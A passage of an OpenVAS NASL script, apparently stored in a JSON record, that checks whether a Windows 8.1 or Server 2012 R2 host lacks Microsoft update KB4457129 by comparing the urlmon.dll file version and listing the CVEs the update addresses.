WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814003\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-5391\", \"CVE-2018-8271\", \"CVE-2018-8315\", \"CVE-2018-8332\",\n \"CVE-2018-8335\", \"CVE-2018-8392\", \"CVE-2018-8393\", \"CVE-2018-8410\",\n \"CVE-2018-8419\", \"CVE-2018-8420\", \"CVE-2018-8424\", \"CVE-2018-8433\",\n \"CVE-2018-8434\", \"CVE-2018-8438\", \"CVE-2018-8439\", \"CVE-2018-8440\",\n \"CVE-2018-8442\", \"CVE-2018-8443\", \"CVE-2018-8444\", \"CVE-2018-8446\",\n \"CVE-2018-8447\", \"CVE-2018-8452\", \"CVE-2018-8455\", \"CVE-2018-8457\",\n \"CVE-2018-8468\", \"CVE-2018-8470\", \"CVE-2018-8475\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-09-12 10:20:08 +0530 (Wed, 12 Sep 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4457129)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4457129\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Denial of service vulnerability (named 'FragmentSmack').\n\n - Windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\n\n - Browser scripting engine improperly handle object types.\n\n - Windows font library improperly handles specially crafted embedded 
fonts.\n\n - SMB improperly handles specially crafted client requests.\n\n - Microsoft JET Database Engine improperly handles objects in memory.\n\n - Windows Kernel API improperly handles registry objects in memory.\n\n - Windows kernel fails to properly initialize a memory address.\n\n - Microsoft XML Core Services improperly MSXML parser processes user input.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Graphics component improperly handles objects in memory.\n\n - Hyper-V improperly validates guest operating system user input.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Server Message Block 2.0 (SMBv2) server improperly handles certain\n requests.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Scripting engine does not properly handle objects in memory in Microsoft browsers.\n\n - Windows improperly parses files.\n\n - Internet Explorer improperly handles script.\n\n - Windows does not properly handle specially crafted image files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the current user, obtain information\n to further compromise the user's system, gain elevated privileges on a targeted\n system and also cause the affected system to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 for 32-bit/x64.\n\n Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4457129\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"urlmon.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19130\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\urlmon.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19130\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}